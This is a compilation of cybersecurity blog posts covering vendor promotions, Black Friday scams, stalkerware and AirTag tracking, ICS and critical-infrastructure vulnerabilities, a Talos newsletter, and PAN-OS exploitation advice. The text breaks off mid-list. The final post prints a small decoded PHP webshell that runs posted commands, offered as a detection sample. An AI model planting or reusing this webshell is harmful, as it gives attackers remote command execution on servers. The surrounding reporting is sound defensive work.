Black Friday 2024 at ANY.RUN

Black Friday 2024 at ANY.RUN is here! As always, we’ve prepared time-limited deals to not only help you save on our tools but also improve collaboration with your colleagues. 

Here’s what we have in store for you this time. 

Hunter Plan: Two Subscriptions for the Price of One 

Hunter plan is designed for individual users, but it doesn’t mean you have to go it alone. Buy an annual Hunter subscription this Black Friday and receive a complimentary one-year Hunter license for your colleague.  

It is perfect for two researchers who want to minimize their expenses on quality malware analysis and get access to our sandbox’s PRO features for the price of just one license.

Get 2 Hunter subscriptions for the price of 1 



See details


Enterprise Plan: License Bundles 

For security teams, the special Enterprise license bundles offer unbeatable value.  

You can buy 5 Enterprise licenses and receive 2 additional ones for free. Go for 10 licenses, and we’ll give you 3 extra ones plus a complimentary Threat Intelligence Lookup basic plan as a gift.  

Special offer for current Enterprise users: If you decide to renew your Enterprise subscription for 24 months, we will also provide you with 6 additional months of free service

We understand that every team has unique needs, so individual packages are also available. Please reach out to us via the Contact Us page to discuss your custom offer and ensure you get the perfect solution for your team.

Get up to 3 Enterprise licenses for free 



See details


TI Lookup: x2 Search Requests 

If you’re a user of ANY.RUN’s TI Lookup or just want to purchase its subscription for the first time, we have great news.  

By buying a TI Lookup plan for 100/500/5,000 or more requests, we’ll double your available search requests. So, if you get a subscription with 100/500/5,000 requests/mo, you will receive a total of 200/1,000/10,000 monthly requests. 

Receive x2 search requests for your TI Lookup subscription 



See details


Don’t Miss Out! 

Our Black Friday special offers kick off on November 25th at 01:00 AM PST (UTC-8) and will run until December 8th, 2024, at 11:59 PM PST (UTC-8). Don’t wait – secure your deal today. 

Contact us today to learn more about these Black Friday offers.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Explore all Black Friday 2024 offers →

The post Black Friday 2024 at ANY.RUN appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Black Friday 2024: how to safeguard your finances against scammers | Kaspersky official blog

In the run-up to any holiday season, scammers get busy. A lot of the time, their actions are rather primitive. Getting ready for Christmas? Expect to be bombarded with fake discounts. Valentine’s Day round the corner? Watch out for fake gifts. Big soccer tournament coming up? There’ll be no shortage of fake tickets.

But the greatest amount of fake stuff appears the week before Black Friday, the day after US Thanksgiving that marks the start of the Christmas period, which is a global sales bonanza for retailers peddling anything from soap to smart TVs — and for scammers too. Today, in the countdown to Black Friday, we look at the latest cybercriminal tricks and ways to counter them.

Discounts! Discounts? Discounts…

Every year in late November, this word experiences a popularity spike. And the craze for low prices plays right into the hands of scammers, whose emails, coupons and phishing links merge with the mass of genuine offers.

Let’s look at an example: Walmart — the world’s largest wholesale and retail chain — appears to be offering customers a $750 gift card:

Follow just four simple steps to (not) get a gift card

Follow just four simple steps to (not) get a gift card

It’s pretty easy to spot the scam here:

  • For a start, $750 is a tidy sum. Ever seen a store offering that much before?
  • To claim your card, you first have to enter your email address and “Basic Info”. It’s effectively the legal purchase of personal data — but at an astronomical price. Would Walmart really be doing that? Hardly.
  • And what’s this third point about completing the recommended deal? To get a gift card, you also have to pay? That’s an obvious red flag. You’re definitely dealing with scammers.

At the very least, the cybercriminals will get the victim’s name and postal address (the goods need to be delivered somewhere, right?), bank card details, plus the money forked out to complete the recommended deal. It’s doubly distressing for said victim: they leak their own data, and are lamenting the $750 that never was; they may even blame Walmart itself.

Scammers are human too and understand how much we all love a freebie. And that makes Black Friday the perfect time for another popular scam: fake giveaways. The prizes are goods that everyone wants. For example, a snazzy iPhone 14. Seems like the scammers here aren’t aware that iPhones 15 and 16 are already with us, as is reliable protection for their owners.

A telltale sign of fraud is a countdown clock next to a pressing call to action

A telltale sign of fraud is a countdown clock next to a pressing call to action

Let’s take a closer look at the screenshot. The cybercriminals, lurking behind a big brand — Amazon — tempt the victim with a whiff of exclusivity (“We are offering great prizes to 10 users”), prompting them to answer four simple questions before the clock ticks down. It might look plausible at first glance, but the catch is always the same: the recipient of the “exclusive” offer must act quickly or risk missing out.

As you’ve already guessed, there’s no iPhone 14 to speak of: the scammers simply scrape what personal data they can and may even ask for some kind of payment via a phishing link. As a result, the victim hands over their personal data and bank details, putting their finances at great risk. Read more about Black Friday scams in our Securelist blogpost.

Black Friday for scammers

If you think that no one needs your data or it’s been leaked before (and not just once), this story is for you. Our experts have found lots of ads selling personal data at a discount on the dark web. It’s an effective scheme (for the scammers): they email out bulk phishing in advance, harvest victims’ data, then sell it at a discount to other scammers at the end of November. Black Friday for everyone!

Scammers are happy to give other scammers a 10% discount

Scammers are happy to give other scammers a 10% discount

All the data is sorted by country and product type: above we see a set of Canadians’ stored-value cards and Italians’ debit cards up for grabs. Admit it, you don’t really want your bank details to be part of a special offer for carders on the dark web.

How to save your finances on Black Friday

First of all, we advise taking extra special care during the sales season: carefully read giveaway terms and conditions, check the details with the organizers (not by using the link or phone number in the email, but by visiting the official website) and stay informed of all the latest scams and tricks by following our Kaspersky Daily blog.

We understand that navigating the saturated information-flow is tough when you’re being assailed on all sides by promotions, “exclusive” offers and discounts. That’s why we offer a straightforward solution: put your trust in automation.

The Kaspersky app has a Safe Money feature that shows the current level of protection of your finances — now for Android users, too.

Safe Money in Kaspersky for Android

Safe Money in Kaspersky for Android

For unbeatable security, we recommend enabling all protection components on the app’s home screen:

  • Safe Browsing. Blocks dangerous websites and checks all links before opening them for you, giving scammers no opportunity to lure you to a phishing site. Remember that Safe Browsing only works in three supported browsers: Google Chrome, Mozilla Firefox, and Yandex Browser.
  • Safe Messaging. Checks for phishing links in all texts and instant messages you receive.
  • Weak Settings Scan. Detects vulnerabilities in your phone settings and tells you how to improve your smartphone security.
  • VPN. Protects online payments and prevents your data from being intercepted when using public Wi-Fi.
  • Wi-Fi Security Check. Checks every Wi-Fi network you connect to and notifies you of any potential danger.

This combination of security features protects you and your finances from the vast majority of scams on Black Friday and beyond. For example, Safe Browsing will stop you from following a phishing link to a scam site to “claim your $750 gift card”; while Safe Messaging will keep cybercriminals at bay in Telegram and other messengers.

Kaspersky official blog – ​Read More

Top ICS Vulnerabilities This Week: Siemens, Baxter, and Subnet Solutions

ICS Vulnerabilities

This week’s Cyble ICS vulnerability report includes critical vulnerabilities like CVE-2024-39332 in Siemens, CVE-2024-9834 in Baxter Life2000 Ventilation System, and CVE-2024-45490 in Subnet Solutions that need urgent patching.

Overview

Cyble Research & Intelligence Labs (CRIL) has analyzed key Industrial Control System (ICS) vulnerabilities reported by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) for the week spanning November 12–18, 2024. It covers vulnerabilities across products from Siemens, Baxter, Subnet Solutions, and others, urging organizations to prioritize patching to mitigate risks.

This week, 21 ICS security advisories disclosed 129 vulnerabilities affecting multiple vendors.

The healthcare sector remains particularly vulnerable, with Baxter’s Life2000 ventilation systems spotlighted due to their potential to compromise patient safety.

Meanwhile, critical manufacturing continues to dominate in terms of affected infrastructure, accounting for 75.2% of reported vulnerabilities.

The Week’s Top ICS Vulnerabilities

Key vulnerabilities identified in this report include:

  1. CVE-2024-45490 (Subnet Solutions):
    • Product: PowerSYSTEM Center PSC 2020
    • Impacted Versions: v5.22.x and prior
    • Severity: Critical
    • Issue: Improper XML External Entity Reference
    • Impact: Affects SCADA, DCS, and BMS systems

  2. CVE-2024-9834 (Baxter):
    • Product: Life2000 Ventilation System (v06.08.00.00 and prior)
    • Severity: Critical
    • Issue: Cleartext Transmission of Sensitive Information

  3. CVE-2024-39332 (Siemens):
    • Product: SINEC INS
    • Impacted Versions: versions prior to V1.0 SP2 Update 3
    • Severity: Critical
    • Issue: Improper Input Validation

  4. CVE-2024-41153 (Hitachi Energy):
    • Product: TRO600 series firmware
    • Impacted Versions: v9.0.1.0 to 9.2.0.0
    • Severity: High
    • Issue: Command Injection

For the complete list of vulnerabilities and their respective mitigations, subscribe to Cyble’s AI-powered threat intelligence product suite!

Recommendations

To address these vulnerabilities and reduce exploitation risks, CRIL recommends:

  • Patch Management: Organizations should develop and implement a comprehensive patch strategy, including inventory, assessment, testing, and deployment. Leverage automation to enhance efficiency.
  • Network Segmentation: Limit attackers’ lateral movement and exposure by implementing robust segmentation practices.
  • Threat Intelligence Monitoring: Continuously track vulnerabilities listed in CISA’s KEV catalog to detect and mitigate actively exploited issues.
  • Physical Security: Protect devices and networks through physical barriers to deter unauthorized access.
  • Incident Response Planning: Maintain a tested and updated plan to respond effectively to cybersecurity incidents.
  • Staff Training: Regularly educate employees on recognizing phishing attempts, proper authentication practices, and adhering to security protocols.

Conclusion

This week’s ICS vulnerability report showcases the growing threats to critical infrastructure, particularly in manufacturing and healthcare. Organizations must prioritize resilience through prompt patching, enhanced monitoring, and proactive cybersecurity strategies to mitigate the risks posed by these vulnerabilities.

With the ICS landscape continually evolving, staying ahead of threat actors is essential to safeguarding vital operations and ensuring system integrity.

The post Top ICS Vulnerabilities This Week: Siemens, Baxter, and Subnet Solutions appeared first on Cyble.

Blog – Cyble – ​Read More

How to protect yourself from someone tracking you with stalkerware or an AirTag | Kaspersky official blog

These days, it’s not just government agencies or private detectives who can spy on you. Tracking has become so easy and cheap that jealous spouses, car thieves, and even overly suspicious employers are doing it. They don’t have to peek around corners, hide in stores, or even get close to their target at all. A smartphone and a Bluetooth tracking beacon — like an Apple AirTag, Samsung Smart Tag or Chipolo — will do the job perfectly. According to one of the lawsuits filed against Apple, this method of spying is used in a variety of crimes —  from stalking ex-partners to planning murders.

Luckily for all of us, there’s protection! As part of Kaspersky’s anti-stalking campaign, we’ll explain how you could be tracked and what you can do about it.

Online and offline tracking

Surveillance of a victim is typically carried out in one of two ways.

Method one: purely software-based. A commercial tracking app is installed on the victim’s smartphone — we call this category of apps stalkerware or spouseware. Such apps are often marketed as “parental control apps”, but they differ from legitimate parental controls because the app’s activity is kept hidden after installation. Most often, the app is entirely invisible on the device, though sometimes it disguises itself as something innocuous, like a messenger, game or photo-gallery app. Stalker apps can repeatedly transmit the victim’s geolocation to a server, send messages and other confidential data from the device to an attacker, and even activate the microphone to record audio.

The main drawback of stalkerware for the attacker is the difficulty of installation — it requires gaining access to the victim’s unlocked smartphone for some time. That’s why, in many cases, especially when it’s an ex-partner or car thief doing the stalking, they use the other method.

Method two: a wireless beacon. A tracking device is planted on the victim. In a car, it might be hidden in an inconspicuous spot, such as behind the license plate; for a person, the tracker could be slipped into a bag or among other personal items.

Originally, Bluetooth trackers — small devices about the size of a coin — were invented to help locate lost belongings such as keys, wallets or luggage. However, if planted on a target, their movements can be tracked in near real-time using a special app. Incidentally, many of today’s Bluetooth headphones also have built-in tracking functionality to make them easier to find — and these too can be used for stalking. So, if you happen to find a pair of fancy headphones lying around, don’t start thinking it’s your lucky day — they may have been deliberately planted in order to track your movements, even after you pair them with your own smartphone.

Tracking technology works even if the beacon is well beyond the Bluetooth range of the stalker’s smartphone: other smartphones help locate the “lost” item. Many of the latest Android and iOS devices report the location of nearby visible beacons to the central servers of Google or Apple. As a result, these tech giants are able to locate any beacon if there’s any modern Bluetooth-enabled smartphone with internet access nearby.

The most popular beacon is still the Apple AirTag, and Apple has gone to a lot of trouble since the first product launch to protect users from malicious use of the tracker. The latest AirTags start beeping to attract attention if they remain away from their owner’s smartphone for too long. However, attackers can easily bypass this protection by damaging the speaker on the tracker. Such hacked tags with disabled speakers can even by bought — easily.

How to protect yourself from surveillance

To safeguard yourself from both online and offline tracking, we recommend using Kaspersky for Android. This tool now includes the “Who’s spying on me” feature, which allows you to quickly detect surveillance.

Protection against tracking beacons. Fortunately, by their very nature, trackers can never be completely invisible, as they’re constantly signaling their presence via Bluetooth. A smartphone equipped with reliable protection can alert the user if an unregistered Bluetooth device is frequently detected nearby or in various different locations. If such a device moves around with you or stays close for too long, Kaspersky for Android will notify you.

Upon discovering a tracker, it’s essential to examine it closely. Sometimes, the situation may be innocent, such as if a family member you spend a lot of time with has a tracker attached to their keys. Occasionally, there may be trackers on rental vehicles or laptops (although rental companies are required to notify users and include this in the contract).

Protection against stalkerware. Kaspersky Premium detects known stalkerware apps. Oh, and by the way — did you know that Kaspersky products won a stalkerware detection test? If such apps — or even their installation files, whether downloaded by you or someone else — are found on your device, Kaspersky for Android will alert you immediately.

Kaspersky for Android detects both installed stalkerware apps (on the right) and their installation files (on the left)

Kaspersky for Android detects both installed stalkerware apps (on the right) and their installation files (on the left)

Even users of the free version of Kaspersky for Android can scan for stalkerware. The only difference in this case between Kaspersky Premium and the free version is that in Kaspersky Premium, scanning is done automatically and continuously. In the free version of Kaspersky for Android, users need to manually initiate each scan.

Suspicious beacons that appear frequently in your vicinity will be listed and labeled in the Device Scanner section.

Kaspersky for Android warns you about spy trackers and provides guidance on what to do

Kaspersky for Android warns you about spy trackers and provides guidance on what to do

Meanwhile, the permission-control feature regularly checks the access of apps to your camera, microphone, location and Bluetooth, so you can quickly identify suspicious new apps.

Additional precautions Several general security and cyber-hygiene measures can make it harder for anyone to track you, and are recommended for all users:

  • Never leave personal items unattended. This applies especially to digital devices that are powered on.
  • Set up biometric authentication on your smartphone.
  • Set the auto-lock screen time to 30 seconds or less.
  • Set up biometrics or a strong password for logging into your laptop, and always lock the screen if you leave your desk.
  • Make a password necessary to install apps from the app store (you can do this on both iOS and Android).
  • Disable the installation of apps from unknown sources on Android.
  • Update all your apps at least once a month and delete any that you no longer use.
  • Never share your passwords with anyone. If you’ve ever shared them with anyone, or you suspect they may have been intercepted, seen or guessed — change them immediately.
  • Avoid logging into personal accounts on shared devices at home or at work, and certainly don’t do this in libraries, hotels or cafes. If you absolutely have to log in, make sure to log out afterwards.
  • Use a password manager, create a unique password for each account, and enable two-factor authentication.
  • Be careful with what you share on social media and in messengers — avoid disclosing details that reveal your location, daily routine, or social circle.

For individuals at higher risk of stalking (say, from an unwanted admirer, disaffected spouse or business partner), here is a more comprehensive list of precautions, including physical safety and legal protection measures.

What to do if you detect surveillance

If you’ve discovered a beacon or tracking app and ruled out any innocent explanations, consider the possible reasons for why you might be under surveillance.

For those involved in domestic violence or serious conflicts, physical safety is the priority. Therefore, in such cases, it’s important not to reveal that you’ve detected the surveillance, but instead contact the police or dedicated support organizations. Likewise, it’s essential that the smartphone or beacon doesn’t end up in a location that would indicate the discovery (for example, a police station). You can either leave the smartphone at home while you go to the police, or arrange to meet a support group in a safe place. For more detailed advice on such tricky cases, consult our anti-stalking awareness guide.

If the risk of violence is low, you should still contact the police. Hand over the spy tracker, and let law enforcement create a digital copy of your smartphone to gather evidence of infection (if present). After that, you can remove the stalkerware from your smartphone.

Kaspersky official blog – ​Read More

CISA and EPA Reports Find Concerning Critical Infrastructure Vulnerabilities

CISA

A pair of recent U.S. government reports offer a fresh reminder of how vulnerable critical infrastructure environments are.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a report this week detailing the ease with which a CISA red team was able to penetrate an unspecified critical infrastructure environment, while the EPA issued a report last week that showed that 27 million Americans are served by drinking water systems with high to critical-severity vulnerabilities.

Vulnerabilities in water and wastewater systems are particularly concerning because communities are generally unprepared for an extended outage to those systems. Cyble researchers recently observed two incidents where threat actors claimed to have accessed water system control infrastructures and changed water system settings – we detail those incidents below.

CISA Red Team Breaches Critical Infrastructure Organization

CISA was asked by the critical infrastructure organization to conduct a red team assessment. During the assessment open-source research and targeted spearphishing campaigns were unsuccessful, but external reconnaissance discovered a web shell left from a third party’s previous security assessment. The red team used the shell for initial access and immediately reported it to the organization’s trusted agents (TAs). The red team was then able to escalate privileges on the host, discover credential material on a misconfigured Network File System (NFS) share, and move from a DMZ to the internal network.

From there, the red team gained further access to several sensitive business systems (SBSs). The team discovered a certificate for client authentication on the NFS share and used it to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller, which was used to further compromise the domain. The red team leveraged this high-level access to exploit SBS targets that had been provided by the organization’s TAs.

CISA published a graphic detailing the exploits:

The targeted organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them to the vulnerability the red team used for initial access, but despite delaying the red team from accessing many SBSs, the red team was still able to access a subset of SBSs. “Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode,” the CISA report said. “In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it.”

CISA Red Team Findings

The CISA red team detailed nine findings are all organizations should be aware of:

Inadequate Perimeter and DMZ Firewalls: The organization’s perimeter network was not adequately firewalled from its internal network, which allowed the red team a path through the DMZ to internal networks.

Network Protection Lacking: CISA said the organization was “too reliant on its host-based tools and lacked network layer protections, such as well-configured web proxies or intrusion prevention systems (IPS).” EDR solutions also failed to detect all of the red team’s payloads.

Insufficient Legacy Environment Protection: Hosts with a legacy operating system did not have a local EDR solution, “which allowed the red team to persist for several months on the hosts undetected.”

Security Alerts Unreviewed: The red team’s activities generated security alerts that network defenders did not review. “In many instances, the organization relied too heavily on known IOCs and their EDR solutions instead of conducting independent analysis of their network activity compared against baselines.”

Identity Management Lacking: The organization had not implemented a centralized identity management system in their Linux network, so defenders had to manually query every Linux host for artifacts related to the red team’s lateral movement through SSH. “Defenders also failed to detect anomalous activity in their organization’s Windows environment because of poor identity management,” CISA said.

Known Insecure and Outdated Software: The red team discovered outdated software on one of the organization’s web servers.

Unsecured Keys and Credentials: The organization stored many private keys that lacked password protection, allowing the red team to steal the keys and use them for authentication.

Email Address Verification: The active Microsoft Office 365 configuration allowed an unauthenticated external user to validate email addresses by observing error messages in the form of HTTP 302 versus HTTP 200 responses, a misconfiguration that helps threat actors verify email addresses before sending phishing emails.

EPA OIG Finds Alarming Drinking Water System Vulnerabilities

A report by the EPA’s Office of the Inspector General (OIG) found that nearly 27 million Americans are served by drinking water systems with high-risk or critical cybersecurity vulnerabilities, and an additional 83 million Americans are served by systems with medium or low-severity vulnerabilities.

The OIG investigation looked at drinking water systems serving 50,000 or more people, 1,062 systems in all, covering 193 million people, or about 56% of the U.S. population. The Oct. 8 vulnerability scans identified 97 high-risk water systems and 211 moderate-risk ones.

The vulnerability tests “consisted of a multilayered, passive assessment tool to scan the public-facing networks” of the drinking water systems, the report said.

“If malicious actors exploited the cybersecurity vulnerabilities we identified in our passive assessment, they could disrupt service or cause irreparable physical damage to drinking water infrastructure,” the OIG report said.

Two Recent Concerning Attacks on Water Systems

While several recent attacks on water utilities did not penetrate operational technology environments, Cyble dark web researchers noted two concerning claims made on Telegram by the Russian-linked People’s Cyber Army (PCA).

In late August, PCA released a video on their Telegram channel claiming responsibility for a cyberattack on a Texas water treatment plant. The threat actors posted a video claiming to show unauthorized access to the plant’s control panel, where the attackers altered water settings.

In September, they claimed unauthorized access to Delaware water towers, again posting a video that claims to show the attackers breaching the plant’s control panel, where they manipulated water system settings.

The CISA and EPA reports—and Cyble’s own observations—suggest that critical infrastructure security, and water system security in particular, are urgent problems requiring attention.

Cyble Recommendations

The CISA report, in particular, highlights security weaknesses that all critical infrastructure organizations should investigate. Beyond that, here are some general recommendations for improving the security of critical environments:

  1. Organizations should follow ICS/OT vulnerability announcements and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly.
  2. Segregating ICS/OT/SCADA networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation.
  3. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks.
  4. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with vulnerability intelligence reports is essential for proactive defense.
  5. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise.

The post CISA and EPA Reports Find Concerning Critical Infrastructure Vulnerabilities appeared first on Cyble.

Blog – Cyble – ​Read More

Bidirectional communication via polyrhythms and shuffles: Without Jon the beat must go on

Bidirectional communication via polyrhythms and shuffles: Without Jon the beat must go on

Welcome to this week’s edition of the Threat Source newsletter. 

Bidirectional communication is foundational to a well-built team regardless of environment. It’s critical in information security to be able to drive a conversation up the ladder and down and not lose the critical elements. One of the most difficult challenges that cyber security teams face is making sure that everyone that is in a decision-making space is aware of the highly technical challenges that the evolving threat landscape dictates. Navigating the challenges that come in continually evolving the team and it’s tools to defend is often a much greater challenge. I’m going to help you with those conversations. In both directions. By talking about drumming. I know, I don’t have the pro wrestling takes that Jon came to the table with, so you’re going to have to run with me Constant Reader.  

I’m going to choose drumming to outline an easy way to identify some complex issues and talk about them in both directions and drumming is a little easier to identify for non-musicians and FAR less contentious than a spicy guitar opinion. Ok, so let’s start with a simple concept.  
 
Sounds difficult. Is difficult.  
Sounds difficult. Is easy. 
Sounds easy. Is difficult.   
Sounds easy. Is easy.  
 
Sounds difficult. Is difficult. This one is easy – Tomas Haake from Meshuggah playing Bleed is a perfect example. Polyrhythms, stamina, speed, interdependence, and complexity. This sounds difficult. It is difficult. Only the criminally insane attempt to learn how to play this song.  

Sounds easy. Is easy. Take Phil Rudd and pick any AC/DC song from Back in Black. The perfect example of sounds easy, is easy. Perfectly in the pocket.  

Sounds easy. Is difficult. This one is harder and will cause someone to wellackshully and I assure you I do not care. I’m going to give two examples, Jeff Porcaro of Toto playing Rosanna and Vinnie Colaiuta playing Seven Days with Sting. Both of these songs are immensely easy to listen to and don’t seem like there’s anything challenging going on. Until you try to play along, then you cry and examine all the choices you’ve made in life.  

Sounds difficult. Is easy. This is going to be a sticky situation, but I’d say that you could throw on anything by Travis Barker and Dave Lombardo. Bring it haters. I’m not saying that they are bad drummers – simply that what they do sounds more difficult than it is.  

Ok William, but how does this help me at all?  

When you have information security meetings with people in your organization take a second as you look at the agenda, and your conversation in specific, and think about the groupings above and determine what kind of drumming you are hearing. Depending on your environment and team the topics will fall naturally into these categories – it can be patch and vulnerability management,  EOL devices that need to be replaced, endpoint detection and response, deciding what traffic is actionable and defining that in your SIEM, forensic analysis, threat hunting, event response, the conversations are as malleable as the threat landscape.  

It’s easy to isolate the things in your environment that are very difficult to defend AND take a skilled defender and complex tooling to defend. Those conversations flow with either junior analysts or C-Level executives. This is the “Sounds difficult. Is difficult.” type of conversation. Ditto the “Sounds easy. Is easy.” conversations are easy to have in either direction. The most difficult topics to convey fall into the “Sounds difficult. Is easy.” or “Sounds easy. Is difficult.” In my experience these conversations are usually much easier to deliver in one direction and much more difficult in the other. Jazz guys enjoy the nuance of Colaiuta and can’t wrap their minds around Lombardo while metalheads love him and don’t want to be bothered by ghost notes. By taking a moment to dissect your topic and determine where you are going to run into the “Sounds difficult. Is easy.” or the “Sounds easy. Is difficult.” situation it will allow you to prepare for those more challenging conversations so that you can craft a narrative to best capture the nuance that might be lost in a highly technical conversation with a C-Level exec, or the motivation for waiting for the next financial quarter for new tooling that the analysts really need.  

I’m not going to lie – you can prepare this way and things can still fall on deaf ears, they can still underestimate the lift required because people are fallible but if you prepare just a bit and know your audience you can drag your C-Level into a discussion on polyrhythm and pull your junior analyst up with a little Vinnie Colaiuta and make them all feel like Phil Rudd.   

The one big thing 

Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia. PXA Stealer targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. PXA Stealer also has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts. 

Why do I care? 

Harvested credentials can allow attackers direct access to your environment without the need to exploit vulnerabilities or face any of your defensive architecture – they can just log in. Cisco Talos Incident Response has observed an increasing number of engagements where this is the case.  

So now what? 

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against PXA Stealer.   

Top security headlines of the week 

Attackers are continuing to upload hundreds of malicious packages to the open-source node package manager (NPM) repository in an attempt to infect the devices of developers that rely on these libraries. (Ars Tecnica

Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that it’s director Jen Easterly will step down from her position on President-elect Donald Trump’s Inauguration Day. (Dark Reading

Palo Alto Networks has released a patch to fix a critical vulnerability in some instances of its firewall management interfaces. PAN observed threat activity exploiting an unauthenticated remote command execution vulnerability against firewall management interfaces. (Bleeping Computer,  Dark Reading)   

Can’t get enough Talos? 

Upcoming events where you can find Talos 

 CyberCon Romania (Nov 21-22)  
Bucharest, Romania 
 
Martin Lee from Cisco Talos will speak on a panel discussion Maintaining Resilience for a Secure Cyber Infrastructure.  

misecCON (Nov. 22)  
Lansing, Michigan 

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting. 

AVAR (Dec 4-6)  
Chennai, India 
 
Vanja Svancer and Chetan Raghuprasad from Cisco Talos will both present, Vanja will be discussing Exploring Vulnerable Windows Drivers, while Chetan presents Sweet and Spicy Recipes for Government Agencies by SneakyChef.  

 

Most prevalent malware files from Talos telemetry over the past week  

 

SHA 256: c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a  

MD5: 3bc6d86fc4b3262137d8d33713ed6082  

Typical Filename: 8c556f0a.dll  

Claimed Product: N/A  

Detection Name: Gen:Variant.Lazy.605353  

 SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a 

MD5: 200206279107f4a2bb1832e3fcd7d64c 

Typical Filename: lsgkozfm.bat 

Claimed Product: N/A 

Detection Name: Win.Dropper.Scar::tpd   

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  

MD5: 71fea034b422e4a17ebb06022532fdde  

Typical Filename: VID001.exe  

Claimed Product: N/A  

Detection Name: RF.Talos.80  

SHA 256: 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66  

MD5: 8b84d61bf3ffec822e2daf4a3665308c  

Typical Filename: RemComSvc.exe  

Claimed Product: N/A  

Detection Name: W32.3A2EA65FAE-95.SBX.TG  

Cisco Talos Blog – ​Read More

German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained Vulnerabilities’ Patching

German

Overview

The German CERT has raised the alarm bells for the exploitation of chained vulnerabilities, urging users to patch them urgently as hundreds of vulnerable instances remain exposed around the country and the globe.

CERT-Bund warned in a notification on X earlier this week: “Attacks are already taking place. Customers should immediately secure their firewalls.” This warning was for two critical vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo Alto Networks’ PAN-OS.

Palo Alto confirmed that these bugs have been actively exploited in a limited set of attacks, tracking under the banner “Operation Lunar Peek.” These vulnerabilities allow attackers to gain unauthorized administrative privileges and execute arbitrary commands, posing a significant risk to organizations using affected devices.

While fixes have been released, the urgency of patching, monitoring, and securing firewall management interfaces has never been higher. This blog provides a detailed breakdown of the vulnerabilities, exploitation patterns, and actionable remediation strategies to safeguard against this ongoing threat.

Understanding the Vulnerabilities

CVE-2024-0012: Authentication Bypass Vulnerability

  • Severity: Critical
  • Impact: Allows unauthenticated attackers with network access to the management web interface to:
    • Gain PAN-OS administrator privileges.
    • Tamper with configurations.
    • Exploit other privilege escalation vulnerabilities, such as CVE-2024-9474.

  • Affected Products:
    PAN-OS 10.2, 11.0, 11.1, and 11.2 software on PA-Series, VM-Series, CN-Series firewalls, Panorama appliances, and WildFire.
    Note: Cloud NGFW and Prisma Access are not affected.
  • Root Cause: Missing authentication checks for critical functions within the PAN-OS management web interface.

CVE-2024-9474: Privilege Escalation Vulnerability

  • Severity: Critical
  • Impact: Allows authenticated PAN-OS administrators to escalate privileges and execute arbitrary commands with root access.
  • Affected Products: Same as CVE-2024-0012, with additional fixes available for PAN-OS 10.1.

These vulnerabilities are particularly dangerous when chained together, enabling unauthenticated remote command execution on vulnerable devices. Palo Alto said that it assesses with moderate to high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available.

Observed Exploitation in Operation Lunar Peek

Palo Alto Networks’ Unit 42 team is actively tracking exploitation activities tied to these vulnerabilities. Key observations include:

  • Initial Access: Exploitation has primarily targeted PAN-OS management web interfaces exposed to the internet. Many attacks originated from IP addresses associated with anonymous VPN services or proxies.
  • Post-Exploitation Activity:
    • Interactive command execution.
    • Deployment of webshells, such as a payload recovered with SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
    • Potential lateral movement and further compromise of network assets.

  • Scanning Activity: Increased manual and automated scans, likely probing for vulnerable interfaces. A report by Censys found 13,324 publicly exposed management interfaces globally, with 34% located in the United States. More than 200 were located in Germany. German CERT has also confirmed active exploitation, urging organizations to “immediately secure their firewalls.”

Remediation and Mitigation

Patching

Palo Alto Networks has released patches addressing both vulnerabilities. Organizations must upgrade to the following versions immediately:

  • PAN-OS 10.2: 10.2.12-h2 or later.
  • PAN-OS 11.0: 11.0.6-h1 or later.
  • PAN-OS 11.1: 11.1.5-h1 or later.
  • PAN-OS 11.2: 11.2.4-h1 or later.
  • PAN-OS 10.1: 10.1.14-h6 (for CVE-2024-9474).

Securing Management Interfaces

Palo Alto Networks strongly recommends the following:

  1. Restrict Interface Access: Allow only trusted internal IP addresses or designated jump boxes to access the management interface.
  2. Disable Public Access: Block internet-facing access to the management interface via network-level controls.
  3. Enable Two-Factor Authentication (2FA): Add an extra layer of security for administrator access.

Monitoring and Detection

  • Deploy detection rules for webshells and other malicious artifacts. The following decoded PHP webshell sample was observed during Operation Lunar Peek:

<?php $z=”system”;

if(${“_POST”}[“b”]==”iUqPd”)

{

    $z(${“_POST”}[“x”]);

};

  • Watch for abnormal activities such as:
    • Unrecognized configuration changes.
